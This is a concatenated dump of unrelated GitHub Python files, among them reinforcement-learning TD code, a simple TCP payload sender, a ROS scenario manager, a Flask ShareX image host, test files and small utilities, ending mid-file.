self.env.reset()\n S.append(s) # append intial state\n a = self.tabularUtils.epsilon_greedy_policy(Q[s, :]) \n A.append(a)\n T = float(\"inf\")\n t = 0\n while True:\n # print(\"time step is %d\" %t)\n if t < T:\n s_next, r, done, _ = self.env.step(a)\n S.append(s_next); R.append(r)\n if done:\n T = t+1\n else:\n a = self.tabularUtils.epsilon_greedy_policy(Q[s, :]) \n A.append(a)\n tau = t - n + 1\n if tau >= 0:\n # compute return G\n G = 0\n if t+1 >= T:\n G = R[T]\n else:\n G += R[t] + self.gamma * np.dot(pi[S[t+1], :], Q[S[t+1], :])\n for k in reversed(range(tau+1, min(t, T-1))):\n # print(\"current k is %d\" %k)\n G = R[k] + self.gamma * np.dot(np.delete(pi[S[k], :], a), np.delete(Q[S[k], :],a)) + \\\n self.gamma * pi[S[k], A[k]] * G\n\n Q[S[tau], A[tau]] = Q[S[tau], A[tau]] + self.alpha * (G - Q[S[tau], A[tau]])\n pi = self.tabularUtils.Q_value_to_greedy_policy(Q)\n\n # move to next time step\n s = s_next\n t += 1\n\n if tau == T-1:\n break\n\n return Q, pi\n \n\n def nStep_Q_delta(self, n):\n pass\n \n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--env_name', dest='env_name', type=str,\n default=\"FrozenLake-Deterministic-v1\",\n choices=[\"gridworld\", \"FrozenLake-v1\"])\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_arguments()\n args.env = gym.make(args.env_name)\n tabular_utils = TabularUtils(args.env)\n\n dp = Tabular_DP(args)\n V_optimal_VI, policy_optimal = dp.value_iteration()\n print(\"Optimal value function from VI\")\n print(V_optimal_VI)\n print(\"Optimal policy from VI\")\n print(tabular_utils.onehot_policy_to_deterministic_policy(policy_optimal))\n\n nstep_td = Tabular_nStepTD(args)\n n = 5\n V_est_nstepTD = nstep_td.nStepTD_prediction(policy_optimal, n)\n print(V_est_nstepTD)\n print(\"mean abs error of n-step TD prediction: %5f\" %np.mean(np.abs(V_est_nstepTD - V_optimal_VI)))\n\n Q_nStepSarsa, policy_nStepSarsa = nstep_td.nStep_sarsa(n)\n print(\"Policy from n-step sarsa\")\n print(tabular_utils.onehot_policy_to_deterministic_policy(policy_nStepSarsa))\n\n Q_nStepOffPolicySarsa, policy_nStepOffPolicySarsa = nstep_td.nStep_sarsa(n)\n print(\"Policy from n-step off-policy sarsa\")\n print(tabular_utils.onehot_policy_to_deterministic_policy(policy_nStepOffPolicySarsa))\n\n Q_nStepTreeBackup, policy_nStepTreeBackup = nstep_td.nStep_tree_backup(n)\n print(\"Policy from n-step tree backup\")\n print(tabular_utils.onehot_policy_to_deterministic_policy(policy_nStepTreeBackup))\n\n learned_policy = policy_nStepSarsa\n tabular_utils.render(learned_policy)\n\n","repo_name":"JeffreyYH/rlbook-drl","sub_path":"ch06to07_TD/nStep_TD.py","file_name":"nStep_TD.py","file_ext":"py","file_size_in_byte":8849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10553648792","text":"import socket\r\nimport time\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Creating socket\r\n\r\n\r\nHost = input(\"Enter the address of the host: \")\r\nPort = int(input(\"Please specify the port: \"))\r\npayload = input(\"Enter your payload: \")\r\n\r\n\r\nprint(\"[+]Connecting to host...\")\r\ntime.sleep(2)\r\n\r\ntry:\r\n s.connect((Host, Port)) #Checking to see if connection was successfull\r\n\r\nexcept OSError as msg:\r\n s.close()\r\n s = None\r\n\r\nif s is None:\r\n print(\"[-]Something went wrong. Please try again.\")\r\nelse:\r\n print(\"[+]Connection successful...\")\r\n time.sleep(1)\r\n print(\"[+]Sending payload...\")\r\n s.sendall(str.encode(payload))\r\n data = s.recv(1024)\r\n\r\nprint('Recieved', repr(data)) #Receving data back\r\n\r\n","repo_name":"Tom-project/General","sub_path":"CustomScripts/PayloadSender.py","file_name":"PayloadSender.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1074169387","text":"#!/usr/bin/env python\nimport rospy\nfrom hbba_msgs.msg import Desire, Event\nfrom hbba_msgs.srv import AddDesires, RemoveDesires\nfrom scenario_manager_action_server import ScenarioManagerAction\n#from states import state_00, state_01, state_02, state_03, state_04, state_05, state_06, state_07, state_08, state_09, state_10, state_11, state_12\n\nclass Scenario2Manager(ScenarioManagerAction):\n\n def __init__(self):\n ScenarioManagerAction.__init__(self, name=\"scenario_2_manager\")\n self.desires = {}\n self.states = {}\n self.current_state = None\n self.reaction_events = [Event.ACC_ON, Event.ACC_OFF, Event.IMP_ON, Event.IMP_OFF]\n # Get and add all states\n self.add_state(state_00.State00(self.desires))\n self.add_state(state_01.State01(self.desires))\n self.add_state(state_02.State02(self.desires))\n self.add_state(state_03.State03(self.desires))\n self.add_state(state_04.State04(self.desires))\n self.register_preempt_callback(self.canceled_cb)\n self.rem_desires = rospy.ServiceProxy('remove_desires', RemoveDesires)\n rospy.wait_for_service(\"remove_desires\")\n\n def add_state(self, state):\n print(\"keys\")\n\n key = state.get_id()\n\n print(\"key\")\n\n if key not in self.states.keys():\n print(\"keys\")\n self.states[key] = state\n print(\"state\")\n\n if self.current_state is None:\n print(\"none\")\n self.current_state = self.states.get(key)\n\n def observe(self):\n self.sub_desires = rospy.Subscriber(\"events\", Event, self.eventCB, queue_size=5)\n\n def stopObserving(self):\n self.sub_desires.unregister()\n\n def eventCB(self, event):\n # Update own desire states w/ events seen\n if event.desire in self.desires:\n if event.type in self.reaction_events:\n self.desires[event.desire] = event.type\n\n react_result = self.states[self.current_state].react_to_event()\n\n if react_result is not None:\n self.states[self.current_state].cleanup()\n\n if react_result == \"Done\":\n self._result.result = True\n self._as.set_succeeded(self._result)\n\n self.current_state = \"state_00\"\n self.stopObserving()\n \n else:\n self._feedback.prev_state = self.current_state\n self.current_state = react_result\n\n self._feedback.state = react_result\n self._as.publish_feedback(self._feedback)\n\n self.states[self.current_state].add_desires()\n \n def execute_cb(self, goal):\n if goal.execute is True:\n self.observe()\n # initial desire addition\n self.states[self.current_state].add_desires()\n else:\n pass\n # no stuff\n\n def canceled_cb(self):\n for desire in self.desires:\n self.rem_desires.call(desire)\n self.desires.clear()\n self.current_state = \"state_00\"\n self._as.set_preempted()\n self.stopObserving()\n\nclass Scenario1Tester:\n def __init__(self):\n client = actionlib.SimpleActioClient(\"sc1tester\", custom_msgs.msg.scenario_managerAction)\n client.wait_for_server()\n goal = custom_msgs.msg.scenario_managerGoal(execute=True)\n client.send_goal(goal)\n\n\nif __name__ == \"__main__\":\n try:\n rospy.init_node(\"scenario_1_manager\")\n\n node = Scenario1Manager()\n doTest = Scenario1Tester()\n\n rospy.spin()\n\n except rospy.ROSInterruptException:\n pass\n","repo_name":"AlexCampanozzi/HomoDeUS","sub_path":"homodeus_motivations/scenarios/motv_scenario_2.py","file_name":"motv_scenario_2.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41029363515","text":"import os\nimport cv2\n\n#Make Sure your directory doesn't have any other type of files. And only contains images.\n\ndef resize_imgs(path, width, height):\n if not os.path.exists('resize'):\n os.makedirs('resize')\n images = os.listdir(path)\n \n for i in range(len(images)):\n img = cv2.imread(os.path.join(path, images[i]), cv2.IMREAD_GRAYSCALE)\n resized = cv2.resize(img, (width, height))\n cv2.imwrite(\"resize/\"+images[i], resized)\n \nresize_imgs('background', 64, 64)","repo_name":"shashankshirol/Crowd-scene-analysis","sub_path":"Processing/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74222908008","text":"#User function Template for python3\n\nclass Solution:\n def cutRod(self, pr, n):\n #code here\n \n dp=[[-1 for i in range(n+1)] for j in range(n)]\n def ans(ind,tar):\n if ind==0:\n return pr[0]*tar\n if dp[ind][tar]!=-1:\n return dp[ind][tar]\n nt=ans(ind-1,tar)\n tk=-1000\n rod=ind+1\n if rod<=tar:\n tk=pr[ind]+ans(ind,tar-rod)\n dp[ind][tar]=max(nt,tk)\n return max(nt,tk)\n \n return ans(n-1,n)\n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\ndef main():\n\n T = int(input())\n\n while(T > 0):\n n = int(input())\n a = [int(x) for x in input().strip().split()]\n ob = Solution()\n print(ob.cutRod(a, n))\n\n T -= 1\n\n\nif __name__ == \"__main__\":\n main()\n# } Driver Code Ends","repo_name":"abhi-apple/leetcode","sub_path":"Rod Cutting - GFG/rod-cutting.py","file_name":"rod-cutting.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"32378065273","text":"from absl import flags\n\n# GCP\nKUBE_CONTEXT = flags.DEFINE_string(\"kube_context\",\n default=None,\n help=\"Kubectl context to use\")\nSECONDARY_KUBE_CONTEXT = flags.DEFINE_string(\n \"secondary_kube_context\",\n default=None,\n help=\"Secondary kubectl context to use for cluster in another region\")\nGCP_SERVICE_ACCOUNT = flags.DEFINE_string(\n \"gcp_service_account\",\n default=None,\n help=\"GCP Service account for GKE workloads to impersonate\")\nTD_BOOTSTRAP_IMAGE = flags.DEFINE_string(\n \"td_bootstrap_image\",\n default=None,\n help=\"Traffic Director gRPC Bootstrap Docker image\")\n\n# Test app\nSERVER_IMAGE = flags.DEFINE_string(\"server_image\",\n default=None,\n help=\"Server Docker image name\")\nSERVER_IMAGE_CANONICAL = flags.DEFINE_string(\n \"server_image_canonical\",\n default=None,\n help=(\"The canonical implementation of the xDS test server.\\n\"\n \"Can be used in tests where language-specific xDS test server\"\n \"does not exist, or missing a feature required for the test.\"))\nCLIENT_IMAGE = flags.DEFINE_string(\"client_image\",\n default=None,\n help=\"Client Docker image name\")\nDEBUG_USE_PORT_FORWARDING = flags.DEFINE_bool(\n \"debug_use_port_forwarding\",\n default=False,\n help=\"Development only: use kubectl port-forward to connect to test app\")\nENABLE_WORKLOAD_IDENTITY = flags.DEFINE_bool(\n \"enable_workload_identity\",\n default=True,\n help=\"Enable the WorkloadIdentity feature\")\n\nflags.mark_flags_as_required([\n \"kube_context\",\n \"td_bootstrap_image\",\n \"server_image\",\n \"client_image\",\n])\n","repo_name":"iridium-browser/iridium-browser","sub_path":"third_party/grpc/src/tools/run_tests/xds_k8s_test_driver/framework/xds_k8s_flags.py","file_name":"xds_k8s_flags.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":314,"dataset":"github-code","pt":"53"} +{"seq_id":"43831092620","text":"from multiprocessing import Process\nimport time\n\n\nclass BaseWorkerProcess(Process):\n \"\"\"Class that abstracts the communication to the master process.\n\n Parameters\n ----------\n conn : multiprocessing.Connection\n Connection to communicate to the master process.\n id : int\n ID of the worker (n cpu).\n ready_val : multiprocessing.Value\n Boolean shared value that indicates if the master process has processed\n the data from the workers.\n lock : multiprocessing.Lock\n A lock to for the ready_val.\n\n Attributes\n ----------\n work : boolean\n Status variable that keeps the worker working.\n conn : multiprocessing.Connection\n Connection to communicate to the master process.\n id : int\n ID of the worker (n cpu).\n ready_val : multiprocessing.Value\n Boolean shared value that indicates if the master process has processed\n the data from the workers.\n lock : multiprocessing.Lock\n A lock to for the ready_val.\n\n \"\"\"\n def __init__(self, conn, id, ready_val, lock, start_with_work=True):\n \"\"\"Constructor.\n\n Parameters\n ----------\n conn : multiprocessing.Connection\n Connection to communicate to the master process.\n id : int\n ID of the worker (n cpu).\n ready_val : multiprocessing.Value\n Boolean shared value that indicates if the master process has processed\n the data from the workers.\n lock : multiprocessing.Lock\n A lock to for the ready_val.\n \"\"\"\n super().__init__()\n self.conn = conn\n self.id = id\n self.ready_val = ready_val\n self.lock = lock\n self.work = True\n self.start_with_work = start_with_work\n print(\"init:\", self.id)\n\n def on_master_progress(self, msg):\n \"\"\"Callback method after the master process has done its work.\n\n Parameters\n ----------\n msg : sring\n Instruction from the master process\n \"\"\"\n pass\n\n def progress(self):\n \"\"\"Method in which the worker can do its work.\"\"\"\n pass\n\n def on_worker_start(self):\n \"\"\"Callback method to preprare before the worker loop begins.\"\"\"\n pass\n\n def check_master_progress(self):\n \"\"\"Wait till the master sends new instructions.\"\"\"\n if self.conn.poll(timeout=None):\n try:\n msg = self.conn.recv()\n except EOFError:\n print(\"EOFError occured\")\n msg = \"stop\"\n #print(\"check master process message:\", msg)\n if msg == \"stop\":\n self.work = False\n return\n self.on_master_progress(msg)\n\n def release_lock(self):\n time.sleep(0.2)\n self.lock.release()\n\n def run(self):\n \"\"\"Main method of the worker.\"\"\"\n self.on_worker_start()\n print(\"ready:\", self.id)\n if self.start_with_work:\n while(True):\n time.sleep(0.5)\n self.lock.acquire()\n if self.ready_val.value == 1:\n self.release_lock()\n break\n self.release_lock()\n print(\"start:\", self.id)\n while self.work:\n progress = self.progress()\n self.conn.send(progress)\n #print(self.id, \": progress send\")\n self.ready_val.value = 0\n while True:\n time.sleep(0.5)\n self.lock.acquire()\n if self.ready_val.value == 1:\n self.release_lock()\n break\n self.release_lock()\n self.ready_val.value = 0\n #print(self.id, \": check master - reset ready val\")\n self.check_master_progress()\n else:\n print(\"start:\", self.id)\n while self.work:\n self.ready_val.value = 0\n while True:\n time.sleep(0.5)\n self.lock.acquire()\n if self.ready_val.value == 1:\n self.release_lock()\n break\n self.release_lock()\n self.ready_val.value = 0\n #print(\"check cmd\", self.id)\n self.check_master_progress()\n progress = self.progress()\n self.conn.send(progress)\n #print(self.id, \": progress send\")\n #print(self.id, \": check master - reset ready val\")\n\n\n print(\"worker\", self.id, \"done\")\n","repo_name":"mati3230/PointNetTransfer","sub_path":"optimization/base_worker_process.py","file_name":"base_worker_process.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17888251217","text":"import pytest\n\nfrom spikeinterface.core import NumpySorting\nimport numpy as np\nfrom spikeinterface.curation import CurationSorting, MergeUnitsSorting, SplitUnitSorting\n\n\ndef test_split_merge():\n spikestimes = [\n {\n 0: np.arange(15),\n 1: np.arange(17),\n 2: np.arange(17) + 5,\n 4: np.concatenate([np.arange(10), np.arange(20, 30)]),\n 5: np.arange(9),\n },\n {0: np.arange(15), 1: np.arange(17), 2: np.arange(40, 140), 4: np.arange(40, 140), 5: np.arange(40, 140)},\n ]\n parent_sort = NumpySorting.from_unit_dict(spikestimes, sampling_frequency=1000) # to have 1 sample=1ms\n parent_sort.set_property(\"someprop\", [float(k) for k in spikestimes[0].keys()]) # float\n\n # %%\n split_index = [v[4] % 2 for v in spikestimes] # spit class 4 in even and odds\n splited = SplitUnitSorting(\n parent_sort, split_unit_id=4, indices_list=split_index, new_unit_ids=[8, 10], properties_policy=\"keep\"\n )\n merged = MergeUnitsSorting(splited, units_to_merge=[[8, 10]], new_unit_ids=[4], properties_policy=\"keep\")\n for i in range(len(spikestimes)):\n assert (\n all(parent_sort.get_unit_spike_train(4, segment_index=i) == merged.get_unit_spike_train(4, segment_index=i))\n == True\n ), \"splir or merge error\"\n assert parent_sort.get_unit_property(4, \"someprop\") == merged.get_unit_property(4, \"someprop\"), (\n \"property wasn\" \"t kept\"\n )\n\n merged_with_dups = MergeUnitsSorting(\n parent_sort, new_unit_ids=[8], units_to_merge=[[0, 1]], properties_policy=\"remove\", delta_time_ms=0.5\n )\n for i in range(len(spikestimes)):\n assert all(\n merged_with_dups.get_unit_spike_train(8, segment_index=i)\n == parent_sort.get_unit_spike_train(1, segment_index=i)\n ), \"error removing duplications\"\n assert np.isnan(merged_with_dups.get_unit_property(8, \"someprop\")), \"error creating empty property\"\n\n\ndef test_curation():\n spikestimes = [\n {\n \"a\": np.arange(15),\n \"b\": np.arange(5, 10),\n \"c\": np.arange(20),\n },\n {\"a\": np.arange(12, 15), \"b\": np.arange(3, 17), \"c\": np.arange(50)},\n ]\n parent_sort = NumpySorting.from_unit_dict(spikestimes, sampling_frequency=1000) # to have 1 sample=1ms\n parent_sort.set_property(\"some_names\", [\"unit_{}\".format(k) for k in spikestimes[0].keys()]) # float\n cs = CurationSorting(parent_sort, properties_policy=\"remove\")\n # %%\n cs.merge([\"a\", \"c\"])\n assert cs.sorting.get_num_units() == len(spikestimes[0]) - 1\n split_index = [v[\"b\"] < 6 for v in spikestimes] # split class 4 in even and odds\n cs.split(\"b\", split_index)\n after_split = cs.sorting\n assert cs.sorting.get_num_units() == len(spikestimes[0])\n\n all_units = cs.sorting.get_unit_ids()\n cs.merge(all_units, new_unit_id=all_units[0])\n assert len(cs.sorting.get_unit_ids()) == 1, \"error merging units\"\n assert cs.sorting.unit_ids[0] == all_units[0]\n cs.undo()\n\n assert cs.sorting is after_split\n cs.redo()\n unit = cs.sorting.get_unit_ids()[0]\n for i in range(len(spikestimes)):\n assert all(\n cs.sorting.get_unit_spike_train(unit, segment_index=i)\n == parent_sort.get_unit_spike_train(\"c\", segment_index=i)\n )\n\n # Test with empty sorting\n empty_sorting = CurationSorting(NumpySorting.from_unit_dict({}, parent_sort.sampling_frequency))\n\n\nif __name__ == \"__main__\":\n test_split_merge()\n test_curation()\n","repo_name":"SpikeInterface/spikeinterface","sub_path":"src/spikeinterface/curation/tests/test_curationsorting.py","file_name":"test_curationsorting.py","file_ext":"py","file_size_in_byte":3530,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"7834238966","text":"#%%dpix=0.054th\nimport autolens as al\nimport numpy as np\nimport grid_util\n\ngrid_data = al.Grid2D.uniform(shape_native=(20,20), pixel_scales=0.5, sub_size=1)\nxgrid_data = grid_data.native[:,:,1]\nygrid_data = grid_data.native[:,:,0]\nrgrid = np.sqrt(xgrid_data**2 + ygrid_data**2)\nannular_mask = np.logical_or(rgrid<1.5, rgrid>4.0)\ngrid_obj = grid_util.SparseDpsiGrid(annular_mask, 0.5, shape_2d_dpsi=(10,10))\ngrid_obj.show_grid()\n\n# %%\ngrid_obj.get_diff_4th_reg_operator_dpsi()\nHy_dpsi_4th_reg, Hx_dpsi_4th_reg = grid_obj.Hy_dpsi_4th_reg, grid_obj.Hx_dpsi_4th_reg\nnp.savetxt('./Hy_dpsi_4th_reg.txt', Hy_dpsi_4th_reg, fmt='%.0f')\nnp.savetxt('./Hx_dpsi_4th_reg.txt', Hx_dpsi_4th_reg, fmt='%.0f')\n\n\nHy_dpsi_2nd_reg, Hx_dpsi_2nd_reg = grid_obj.Hy_dpsi_2nd_reg, grid_obj.Hx_dpsi_2nd_reg\nnp.savetxt('./Hy_dpsi_2nd_reg.txt', Hy_dpsi_2nd_reg, fmt='%.0f')\nnp.savetxt('./Hx_dpsi_2nd_reg.txt', Hx_dpsi_2nd_reg, fmt='%.0f')\n\n# %%\n","repo_name":"caoxiaoyue/potential_correction_develop","sub_path":"prepare_test_data/test_grid/for_test_data.py","file_name":"for_test_data.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11686176454","text":"import RPi.GPIO as GPIO\nimport time\nfrom picamera import PiCamera\n\ndef take_photo(camera):\n file_name = \"/home/pi/camera/img_\" + str(time.time()) + \".jpg\"\n camera.capture(file_name)\n return file_name\n \n\nPIR_PIN = 4\nLED_PIN = 17\n\n# Setup camera\ncamera = PiCamera()\ncamera.resolution = (720, 480)\ncamera.rotation = 180\nprint(\"Waiting 2 seconds to init the camera...\")\ntime.sleep(2)\nprint(\"Camera setup OK.\")\n\n# Setup GPIOs\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(PIR_PIN, GPIO.IN)\nGPIO.setup(LED_PIN, GPIO.OUT)\nGPIO.output(LED_PIN, GPIO.LOW)\nprint(\"GPIOs setup OK.\")\n\nMOV_DETECT_TRESHOLD = 3.0\nlast_pir_state = GPIO.input(PIR_PIN)\nmovement_timer = time.time()\nMIN_DURATION_BETWEEN_2_PHOTOS = 60.0\nlast_time_photo_taken = 0\n\nprint(\"Everything has been setup.\")\n\ntry:\n while True:\n time.sleep(0.01)\n pir_state = GPIO.input(PIR_PIN)\n if pir_state == GPIO.HIGH:\n GPIO.output(LED_PIN, GPIO.HIGH)\n else:\n GPIO.output(LED_PIN, GPIO.LOW)\n if last_pir_state == GPIO.LOW and pir_state == GPIO.HIGH:\n movement_timer = time.time()\n if last_pir_state == GPIO.HIGH and pir_state == GPIO.HIGH:\n if time.time() - movement_timer > MOV_DETECT_TRESHOLD:\n if time.time() - last_time_photo_taken > MIN_DURATION_BETWEEN_2_PHOTOS:\n print(\"Take photo and send it by email\")\n take_photo(camera)\n last_time_photo_taken = time.time()\n last_pir_state = pir_state\nexcept KeyboardInterrupt:\n GPIO.cleanup()\n","repo_name":"capfish-yjy/raspberrypi_azure_face_recognition","sub_path":"rasoberryPi/pir_camera_azure.py","file_name":"pir_camera_azure.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36895094395","text":"import random,string,sqlite3\nfrom flask import Flask, request, send_from_directory,g,render_template,abort\napp = Flask(__name__)\n\ndef genRandomString(length):\n\treturn ''.join(random.choice(string.ascii_lowercase) for i in range(length))\n\t\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = sqlite3.connect('db.db')\n return db\n\t\ndef initdb():\n\tdb = get_db()\n\tcursor = db.cursor()\n\tcursor.execute(\"CREATE TABLE IF NOT EXISTS keys(name text NOT NULL, key text NOT NULL, admin boolean NOT NULL, unique (name, key))\")\n\tcursor.execute(\"CREATE TABLE IF NOT EXISTS uploads(name text NOT NULL, image text NOT NULL)\")\n\tcursor.execute(\"INSERT OR IGNORE INTO keys (name, key, admin) VALUES (?,?,?)\", ('Admin', 'CHANGEME', True))\n\tdb.commit()\n\t\ndef keySearch(key):\n\tcursor = get_db().cursor()\n\tcursor.execute(\"SELECT * FROM keys WHERE key=?\", (key,))\n\tif cursor.fetchone() is not None:\n\t\treturn True\n\treturn False\n\t\ndef getName(key):\n\tcursor = get_db().cursor()\n\tcursor.execute(\"SELECT * FROM keys WHERE key=?\", (key,))\n\tresult = cursor.fetchone()\n\tif result:\n\t\treturn result[0]\n\telse:\n\t\treturn None\n\t\t\ndef getImages(name):\n\tcursor = get_db().cursor()\n\tcursor.execute(\"SELECT * FROM uploads WHERE name=?\", (name,))\n\treturn cursor.fetchall()\n\t\ndef isAdmin(key):\n\tcursor = get_db().cursor()\n\tcursor.execute(\"SELECT * FROM keys where key=?\", (key,))\n\tresult = cursor.fetchone()\n\tif result:\n\t\tif result[2] == 1:\n\t\t\treturn True\n\t\treturn False\n\treturn None\n\n@app.teardown_appcontext\ndef close_connection(exception):\n db = getattr(g, '_database', None)\n if db is not None:\n db.close()\n\n@app.route('/up', methods=['POST'])\ndef upload():\n\ttry:\n\t\tif keySearch(request.form['key']) == False:\n\t\t\treturn 'Your key is invalid!', 401\n\texcept:\n\t\treturn 'You must supply a key!', 401\n\timage = request.files['image']\n\tfilename = '{}.png'.format(genRandomString(6))\n\timage.save('u/{}'.format(filename))\n\tdb = get_db()\n\tcursor = db.cursor()\n\tcursor.execute(\"INSERT INTO uploads (name, image) VALUES (?,?)\", (getName(request.form['key']), filename))\n\tdb.commit()\n\treturn '{}u/{}'.format(request.url_root, filename), 200\n\t\n@app.route('/gallery', methods=['GET', 'POST'])\ndef login():\n\tif request.method == 'POST':\n\t\tif keySearch(request.form['key']):\n\t\t\tname=getName(request.form['key'])\n\t\t\treturn render_template('gallery.html', name=name, images=getImages(name))\n\treturn render_template('login.html'), 200\n\t\n@app.route('/admin', methods=['GET', 'POST'])\ndef admin():\n\tif request.method == 'POST' and isAdmin(request.form['key']):\n\t\treturn render_template('admin.html', key=request.form['key']), 200\n\treturn render_template('login.html'), 200\n\t\n@app.route('/adduser', methods=['POST'])\ndef adduser():\n\tif isAdmin(request.form['adminKey']):\n\t\tif request.form['admin']:\n\t\t\tadmin=True\n\t\telse:\n\t\t\tadmin=False\n\t\tdb = get_db()\n\t\tcursor = db.cursor()\n\t\tcursor.execute(\"INSERT OR IGNORE INTO keys (name, key, admin) VALUES (?,?,?)\", (request.form['name'], request.form['key'], admin))\n\t\tdb.commit()\n\t\treturn '{} added successfully!'.format(request.form['name']), 200\n\tabort(404)\n\t\n@app.route('/edituser', methods=['POST'])\ndef edituser():\n\tif isAdmin(request.form['adminKey']):\n\t\tdb = get_db()\n\t\tcursor = db.cursor()\n\t\tcursor.execute(\"UPDATE keys SET key = ? WHERE name = ?\", (request.form['key'], request.form['name']))\n\t\tdb.commit()\n\t\treturn '{} edited successfully!'.format(request.form['name']), 200\n\tabort(404)\n\n@app.route('/u/', methods=['GET'])\ndef u(image):\n\treturn send_from_directory('u', image), 200\n\t\nwith app.app_context():\n\tinitdb()","repo_name":"reciate/sharexfl","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43108179327","text":"from mock import Mock, patch\nfrom pytest import fixture\n\nfrom configuration.spreadsheet_configuration import SpreadsheetConfiguration\n\n\n@fixture\ndef sheets_data():\n return {\n 'namedRanges': [{\n 'name': 'REPLACE_ME',\n 'range': {\n 'sheetId': '123',\n 'startColumnIndex': 1,\n 'endColumnIndex': 1,\n 'startRowIndex': 1,\n 'endRowIndex': 1\n }\n },\n {\n 'name': 'REPLACE_ME',\n 'range': {\n 'sheetId': '123',\n 'startColumnIndex': 1,\n 'endColumnIndex': 1,\n 'startRowIndex': 1,\n 'endRowIndex': 1\n }\n }],\n 'sheets': [{\n 'properties': {\n 'sheetId': '123',\n 'title': 'Test'\n }\n }]\n }\n\n\n@patch('configuration.spreadsheet_configuration.build')\ndef test_get_all_bases(mock_build, sheets_data):\n\n # Mock imported build for API\n sheets_mock = Mock()\n mock_build.return_value.spreadsheets.return_value = sheets_mock\n\n # Mock behaviour\n sheets_data['namedRanges'][0]['name'] = SpreadsheetConfiguration.BASE_VIDEOS_NAMED_RANGE\n sheets_mock.get.return_value.execute.return_value = sheets_data\n\n # Values to test\n values = [\n ['BaseUm', 'BaseArquivoUm.mp4'],\n ['Base2', 'Base2.mp4']\n ]\n\n sheets_mock.values.return_value.get.return_value.execute.return_value = {\n 'values': values\n }\n\n # Act\n configuration = SpreadsheetConfiguration('spreadsheet_id', 'credentials')\n all_base_videos = configuration.get_all_bases()\n\n # Assert\n assert len(all_base_videos) == 2\n assert all_base_videos[values[0][0]] == values[0][1]\n assert all_base_videos[values[1][0]] == values[1][1]\n","repo_name":"google/product_video_ads","sub_path":"video-generator/src/tests/unit/test_spreadsheet_configuration.py","file_name":"test_spreadsheet_configuration.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"53"} +{"seq_id":"41782340244","text":"import pandas as pd\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import MinMaxScaler\n\n\n\ndef cleanData(df):\n \"\"\"\n Clean data by replace NaN values with median.\n \"\"\"\n # use SimpleImputer to clean training data with median values\n imputer = SimpleImputer(strategy='median')\n imputer.fit(df)\n\n # transform the features\n x = imputer.transform(df)\n # convert the numpy array x to dataframe\n df = pd.DataFrame(x, columns=df.columns, index=list(df.index.values))\n\n # standardize columns whose max value is greater than threshold value\n # use the MinMaxScaler to standardize the target columns\n df = standardize_big_values_by_min_max(df)\n\n return df\n\n\ndef standardize_big_values_by_min_max(df, thresh=100):\n # find columns whose max value is greater than threshold value\n overThresh = df.max() > thresh\n targetCols = overThresh[overThresh].index.values\n\n scaler = MinMaxScaler()\n scaler.fit_transform(df[targetCols])\n\n return df\n\n\ndef mapYValues_binary(df):\n \"\"\"\n Maps the y values in the binary dataset.\n\n :param df: The data\n :return df: The transformed dataset\n \"\"\"\n mapping = {'background': 1, 'seal': 2}\n df.replace({'background': mapping}, inplace=True)\n return df\n\n\ndef mapResults_binary(df):\n \"\"\"\n Maps the results of the binary classification.\n\n :param df: The data\n :return df: The transformed dataset\n \"\"\"\n mapping = {1: 'background', 2: 'seal'}\n df.replace({'predictions': mapping}, inplace=True)\n return df\n\n\ndef mapYValues_multiclass(df):\n \"\"\"\n Maps the y values in the multi dataset.\n\n :param df: The data\n :return df: The transformed dataset\n \"\"\"\n mapping = {'background': 1, 'dead pup': 2, 'juvenile': 3, 'moulted pup': 4, 'whitecoat': 5}\n df.replace({'whitecoat': mapping}, inplace=True)\n return df\n\n\ndef mapResults_multi(df):\n \"\"\"\n Maps the results of the multi-class classification.\n\n :param df: The data\n :return df: The transformed dataset\n \"\"\"\n mapping = {1: 'background', 2: 'dead pup', 3: 'juvenile', 4: 'moulted pup', 5: 'whitecoat'}\n df.replace({'predictions': mapping}, inplace=True)\n return df\n","repo_name":"YeonwooSung/Seal_Image_Classification","sub_path":"src/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16263709000","text":"# this module help calc data\n\nimport queue\nimport threading\nimport time\nimport math\n\nfrom .location_config import SystemState\nfrom .location_list import LocationList\n\nclass LocationCalculater:\n def __init__(self,\n server, grd_location_syncer, sim_location_syncer\n ):\n print(\"__init__ LocationCalculater start\")\n\n self.info_queue = queue.Queue(-1) # recv json format\n self.query_queue = queue.Queue(-1)\n\n self.sensor_lock = 